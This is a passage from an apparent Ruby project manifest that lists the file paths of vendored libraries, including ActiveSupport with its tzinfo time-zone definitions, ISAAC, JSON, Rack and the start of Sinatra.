"vendor/activesupport/lib/active_support/core_ext/object/metaclass.rb",
"vendor/activesupport/lib/active_support/core_ext/object/misc.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname/clean_within.rb",
"vendor/activesupport/lib/active_support/core_ext/proc.rb",
"vendor/activesupport/lib/active_support/core_ext/process.rb",
"vendor/activesupport/lib/active_support/core_ext/process/daemon.rb",
"vendor/activesupport/lib/active_support/core_ext/range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/blockless_step.rb",
"vendor/activesupport/lib/active_support/core_ext/range/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/range/include_range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/overlaps.rb",
"vendor/activesupport/lib/active_support/core_ext/rexml.rb",
"vendor/activesupport/lib/active_support/core_ext/string.rb",
"vendor/activesupport/lib/active_support/core_ext/string/access.rb",
"vendor/activesupport/lib/active_support/core_ext/string/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/string/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/string/filters.rb",
"vendor/activesupport/lib/active_support/core_ext/string/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/string/iterators.rb",
"vendor/activesupport/lib/active_support/core_ext/string/multibyte.rb",
"vendor/activesupport/lib/active_support/core_ext/string/starts_ends_with.rb",
"vendor/activesupport/lib/active_support/core_ext/string/xchar.rb",
"vendor/activesupport/lib/active_support/core_ext/symbol.rb",
"vendor/activesupport/lib/active_support/core_ext/time.rb",
"vendor/activesupport/lib/active_support/core_ext/time/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/time/zones.rb",
"vendor/activesupport/lib/active_support/dependencies.rb",
"vendor/activesupport/lib/active_support/deprecation.rb",
"vendor/activesupport/lib/active_support/duration.rb",
"vendor/activesupport/lib/active_support/gzip.rb",
"vendor/activesupport/lib/active_support/inflections.rb",
"vendor/activesupport/lib/active_support/inflector.rb",
"vendor/activesupport/lib/active_support/json.rb",
"vendor/activesupport/lib/active_support/json/decoding.rb",
"vendor/activesupport/lib/active_support/json/encoders/date.rb",
"vendor/activesupport/lib/active_support/json/encoders/date_time.rb",
"vendor/activesupport/lib/active_support/json/encoders/enumerable.rb",
"vendor/activesupport/lib/active_support/json/encoders/false_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/hash.rb",
"vendor/activesupport/lib/active_support/json/encoders/nil_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/numeric.rb",
"vendor/activesupport/lib/active_support/json/encoders/object.rb",
"vendor/activesupport/lib/active_support/json/encoders/regexp.rb",
"vendor/activesupport/lib/active_support/json/encoders/string.rb",
"vendor/activesupport/lib/active_support/json/encoders/symbol.rb",
"vendor/activesupport/lib/active_support/json/encoders/time.rb",
"vendor/activesupport/lib/active_support/json/encoders/true_class.rb",
"vendor/activesupport/lib/active_support/json/encoding.rb",
"vendor/activesupport/lib/active_support/json/variable.rb",
"vendor/activesupport/lib/active_support/locale/en.yml",
"vendor/activesupport/lib/active_support/memoizable.rb",
"vendor/activesupport/lib/active_support/multibyte.rb",
"vendor/activesupport/lib/active_support/multibyte/chars.rb",
"vendor/activesupport/lib/active_support/multibyte/exceptions.rb",
"vendor/activesupport/lib/active_support/multibyte/unicode_database.rb",
"vendor/activesupport/lib/active_support/option_merger.rb",
"vendor/activesupport/lib/active_support/ordered_hash.rb",
"vendor/activesupport/lib/active_support/ordered_options.rb",
"vendor/activesupport/lib/active_support/rescuable.rb",
"vendor/activesupport/lib/active_support/secure_random.rb",
"vendor/activesupport/lib/active_support/string_inquirer.rb",
"vendor/activesupport/lib/active_support/test_case.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test/unit/assertions.rb",
"vendor/activesupport/lib/active_support/testing/default.rb",
"vendor/activesupport/lib/active_support/testing/performance.rb",
"vendor/activesupport/lib/active_support/testing/setup_and_teardown.rb",
"vendor/activesupport/lib/active_support/time_with_zone.rb",
"vendor/activesupport/lib/active_support/values/time_zone.rb",
"vendor/activesupport/lib/active_support/values/unicode_tables.dat",
"vendor/activesupport/lib/active_support/vendor.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/css.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xchar.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlbase.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlevents.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlmarkup.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/backend/simple.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/exceptions.rb",
"vendor/activesupport/lib/active_support/vendor/memcache-client-1.5.1/memcache.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Algiers.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Cairo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Casablanca.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Harare.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Johannesburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Monrovia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Nairobi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/Buenos_Aires.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/San_Juan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Bogota.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Caracas.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chicago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chihuahua.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Denver.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Godthab.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Guatemala.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Halifax.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Indiana/Indianapolis.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Juneau.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/La_Paz.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Lima.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Los_Angeles.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mazatlan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mexico_City.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Monterrey.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/New_York.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Phoenix.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Regina.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Santiago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Sao_Paulo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/St_Johns.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Tijuana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Almaty.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baghdad.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baku.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Bangkok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Chongqing.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Colombo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Dhaka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Hong_Kong.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Irkutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jakarta.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jerusalem.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kabul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kamchatka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Karachi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Katmandu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kolkata.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Krasnoyarsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuala_Lumpur.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuwait.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Magadan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Muscat.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Novosibirsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Rangoon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Riyadh.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Seoul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Shanghai.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Singapore.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Taipei.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tashkent.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tbilisi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tehran.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tokyo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Ulaanbaatar.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Urumqi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Vladivostok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yakutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yekaterinburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yerevan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Azores.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Cape_Verde.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/South_Georgia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Adelaide.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Brisbane.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Darwin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Hobart.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Melbourne.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Perth.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Sydney.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Etc/UTC.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Amsterdam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Athens.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Belgrade.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Berlin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bratislava.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Brussels.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bucharest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Budapest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Copenhagen.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Dublin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Helsinki.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Istanbul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Kiev.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Lisbon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Ljubljana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/London.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Madrid.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Minsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Moscow.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Paris.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Prague.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Riga.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Rome.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sarajevo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Skopje.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sofia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Stockholm.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Tallinn.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vienna.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vilnius.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Warsaw.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Zagreb.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Auckland.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Fiji.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Guam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Honolulu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Majuro.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Midway.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Noumea.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Pago_Pago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Port_Moresby.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Tongatapu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/info_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/offset_rationals.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/ruby_core_support.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/time_or_datetime.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_definition.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_offset_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_period.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_transition_info.rb",
"vendor/activesupport/lib/active_support/vendor/xml-simple-1.0.11/xmlsimple.rb",
"vendor/activesupport/lib/active_support/version.rb",
"vendor/activesupport/lib/active_support/whiny_nil.rb",
"vendor/activesupport/lib/activesupport.rb",
"vendor/isaac/LICENSE",
"vendor/isaac/README",
"vendor/isaac/TODO",
"vendor/isaac/VERSIONS",
"vendor/isaac/crypt/ISAAC.rb",
"vendor/isaac/isaac.gemspec",
"vendor/isaac/setup.rb",
"vendor/isaac/test/TC_ISAAC.rb",
"vendor/json/CHANGES",
"vendor/json/GPL",
"vendor/json/README",
"vendor/json/RUBY",
"vendor/json/Rakefile",
"vendor/json/TODO",
"vendor/json/VERSION",
"vendor/json/benchmarks/benchmark.txt",
"vendor/json/benchmarks/benchmark_generator.rb",
"vendor/json/benchmarks/benchmark_parser.rb",
"vendor/json/benchmarks/benchmark_rails.rb",
"vendor/json/bin/edit_json.rb",
"vendor/json/bin/prettify_json.rb",
"vendor/json/data/example.json",
"vendor/json/data/index.html",
"vendor/json/data/prototype.js",
"vendor/json/ext/json/ext/generator/extconf.rb",
"vendor/json/ext/json/ext/generator/generator.c",
"vendor/json/ext/json/ext/generator/unicode.c",
"vendor/json/ext/json/ext/generator/unicode.h",
"vendor/json/ext/json/ext/parser/extconf.rb",
"vendor/json/ext/json/ext/parser/parser.c",
"vendor/json/ext/json/ext/parser/parser.rl",
"vendor/json/ext/json/ext/parser/unicode.c",
"vendor/json/ext/json/ext/parser/unicode.h",
"vendor/json/install.rb",
"vendor/json/lib/json.rb",
"vendor/json/lib/json/Array.xpm",
"vendor/json/lib/json/FalseClass.xpm",
"vendor/json/lib/json/Hash.xpm",
"vendor/json/lib/json/Key.xpm",
"vendor/json/lib/json/NilClass.xpm",
"vendor/json/lib/json/Numeric.xpm",
"vendor/json/lib/json/String.xpm",
"vendor/json/lib/json/TrueClass.xpm",
"vendor/json/lib/json/add/core.rb",
"vendor/json/lib/json/add/rails.rb",
"vendor/json/lib/json/common.rb",
"vendor/json/lib/json/editor.rb",
"vendor/json/lib/json/ext.rb",
"vendor/json/lib/json/json.xpm",
"vendor/json/lib/json/pure.rb",
"vendor/json/lib/json/pure/generator.rb",
"vendor/json/lib/json/pure/parser.rb",
"vendor/json/lib/json/version.rb",
"vendor/json/tests/fixtures/fail1.json",
"vendor/json/tests/fixtures/fail10.json",
"vendor/json/tests/fixtures/fail11.json",
"vendor/json/tests/fixtures/fail12.json",
"vendor/json/tests/fixtures/fail13.json",
"vendor/json/tests/fixtures/fail14.json",
"vendor/json/tests/fixtures/fail18.json",
"vendor/json/tests/fixtures/fail19.json",
"vendor/json/tests/fixtures/fail2.json",
"vendor/json/tests/fixtures/fail20.json",
"vendor/json/tests/fixtures/fail21.json",
"vendor/json/tests/fixtures/fail22.json",
"vendor/json/tests/fixtures/fail23.json",
"vendor/json/tests/fixtures/fail24.json",
"vendor/json/tests/fixtures/fail25.json",
"vendor/json/tests/fixtures/fail27.json",
"vendor/json/tests/fixtures/fail28.json",
"vendor/json/tests/fixtures/fail3.json",
"vendor/json/tests/fixtures/fail4.json",
"vendor/json/tests/fixtures/fail5.json",
"vendor/json/tests/fixtures/fail6.json",
"vendor/json/tests/fixtures/fail7.json",
"vendor/json/tests/fixtures/fail8.json",
"vendor/json/tests/fixtures/fail9.json",
"vendor/json/tests/fixtures/pass1.json",
"vendor/json/tests/fixtures/pass15.json",
"vendor/json/tests/fixtures/pass16.json",
"vendor/json/tests/fixtures/pass17.json",
"vendor/json/tests/fixtures/pass2.json",
"vendor/json/tests/fixtures/pass26.json",
"vendor/json/tests/fixtures/pass3.json",
"vendor/json/tests/runner.rb",
"vendor/json/tests/test_json.rb",
"vendor/json/tests/test_json_addition.rb",
"vendor/json/tests/test_json_fixtures.rb",
"vendor/json/tests/test_json_generate.rb",
"vendor/json/tests/test_json_rails.rb",
"vendor/json/tests/test_json_unicode.rb",
"vendor/json/tools/fuzz.rb",
"vendor/json/tools/server.rb",
"vendor/rack/AUTHORS",
"vendor/rack/COPYING",
"vendor/rack/KNOWN-ISSUES",
"vendor/rack/RDOX",
"vendor/rack/README",
"vendor/rack/Rakefile",
"vendor/rack/SPEC",
"vendor/rack/bin/rackup",
"vendor/rack/contrib/rack_logo.svg",
"vendor/rack/example/lobster.ru",
"vendor/rack/example/protectedlobster.rb",
"vendor/rack/example/protectedlobster.ru",
"vendor/rack/lib/rack.rb",
"vendor/rack/lib/rack/adapter/camping.rb",
"vendor/rack/lib/rack/auth/abstract/handler.rb",
"vendor/rack/lib/rack/auth/abstract/request.rb",
"vendor/rack/lib/rack/auth/basic.rb",
"vendor/rack/lib/rack/auth/digest/md5.rb",
"vendor/rack/lib/rack/auth/digest/nonce.rb",
"vendor/rack/lib/rack/auth/digest/params.rb",
"vendor/rack/lib/rack/auth/digest/request.rb",
"vendor/rack/lib/rack/auth/openid.rb",
"vendor/rack/lib/rack/builder.rb",
"vendor/rack/lib/rack/cascade.rb",
"vendor/rack/lib/rack/commonlogger.rb",
"vendor/rack/lib/rack/conditionalget.rb",
"vendor/rack/lib/rack/content_length.rb",
"vendor/rack/lib/rack/deflater.rb",
"vendor/rack/lib/rack/directory.rb",
"vendor/rack/lib/rack/file.rb",
"vendor/rack/lib/rack/handler.rb",
"vendor/rack/lib/rack/handler/cgi.rb",
"vendor/rack/lib/rack/handler/evented_mongrel.rb",
"vendor/rack/lib/rack/handler/fastcgi.rb",
"vendor/rack/lib/rack/handler/lsws.rb",
"vendor/rack/lib/rack/handler/mongrel.rb",
"vendor/rack/lib/rack/handler/scgi.rb",
"vendor/rack/lib/rack/handler/swiftiplied_mongrel.rb",
"vendor/rack/lib/rack/handler/thin.rb",
"vendor/rack/lib/rack/handler/webrick.rb",
"vendor/rack/lib/rack/head.rb",
"vendor/rack/lib/rack/lint.rb",
"vendor/rack/lib/rack/lobster.rb",
"vendor/rack/lib/rack/methodoverride.rb",
"vendor/rack/lib/rack/mime.rb",
"vendor/rack/lib/rack/mock.rb",
"vendor/rack/lib/rack/recursive.rb",
"vendor/rack/lib/rack/reloader.rb",
"vendor/rack/lib/rack/request.rb",
"vendor/rack/lib/rack/response.rb",
"vendor/rack/lib/rack/session/abstract/id.rb",
"vendor/rack/lib/rack/session/cookie.rb",
"vendor/rack/lib/rack/session/memcache.rb",
"vendor/rack/lib/rack/session/pool.rb",
"vendor/rack/lib/rack/showexceptions.rb",
"vendor/rack/lib/rack/showstatus.rb",
"vendor/rack/lib/rack/static.rb",
"vendor/rack/lib/rack/urlmap.rb",
"vendor/rack/lib/rack/utils.rb",
"vendor/rack/test/cgi/lighttpd.conf",
"vendor/rack/test/cgi/test",
"vendor/rack/test/cgi/test.fcgi",
"vendor/rack/test/cgi/test.ru",
"vendor/rack/test/spec_rack_auth_basic.rb",
"vendor/rack/test/spec_rack_auth_digest.rb",
"vendor/rack/test/spec_rack_auth_openid.rb",
"vendor/rack/test/spec_rack_builder.rb",
"vendor/rack/test/spec_rack_camping.rb",
"vendor/rack/test/spec_rack_cascade.rb",
"vendor/rack/test/spec_rack_cgi.rb",
"vendor/rack/test/spec_rack_commonlogger.rb",
"vendor/rack/test/spec_rack_conditionalget.rb",
"vendor/rack/test/spec_rack_content_length.rb",
"vendor/rack/test/spec_rack_deflater.rb",
"vendor/rack/test/spec_rack_directory.rb",
"vendor/rack/test/spec_rack_fastcgi.rb",
"vendor/rack/test/spec_rack_file.rb",
"vendor/rack/test/spec_rack_handler.rb",
"vendor/rack/test/spec_rack_head.rb",
"vendor/rack/test/spec_rack_lint.rb",
"vendor/rack/test/spec_rack_lobster.rb",
"vendor/rack/test/spec_rack_methodoverride.rb",
"vendor/rack/test/spec_rack_mock.rb",
"vendor/rack/test/spec_rack_mongrel.rb",
"vendor/rack/test/spec_rack_recursive.rb",
"vendor/rack/test/spec_rack_request.rb",
"vendor/rack/test/spec_rack_response.rb",
"vendor/rack/test/spec_rack_session_cookie.rb",
"vendor/rack/test/spec_rack_session_memcache.rb",
"vendor/rack/test/spec_rack_session_pool.rb",
"vendor/rack/test/spec_rack_showexceptions.rb",
"vendor/rack/test/spec_rack_showstatus.rb",
"vendor/rack/test/spec_rack_static.rb",
"vendor/rack/test/spec_rack_thin.rb",
"vendor/rack/test/spec_rack_urlmap.rb",
"vendor/rack/test/spec_rack_utils.rb",
"vendor/rack/test/spec_rack_webrick.rb",
"vendor/rack/test/testrequest.rb",
"vendor/sinatra/AUTHORS",
"vendor/sinatra/CHANGES",
"vendor/sinatra/LICENSE",
"vendor/sinatra/README.rdoc",
"vendor/sinatra/Rakefile",
"vendor/sinatra/compat/app_test.rb",
"vendor/sinatra/compat/application_test.rb",
"vendor/sinatra/compat/builder_test.rb",
"vendor/sinatra/compat/custom_error_test.rb",
"vendor/sinatra/compat/erb_test.rb",
"vendor/sinatra/compat/events_test.rb",
"vendor/sinatra/compat/filter_test.rb",
"vendor/sinatra/compat/haml_test.rb",
"vendor/sinatra/compat/helper.rb",
"vendor/sinatra/compat/mapped_error_test.rb",
"vendor/sinatra/compat/pipeline_test.rb",
"vendor/sinatra/compat/public/foo.xml",
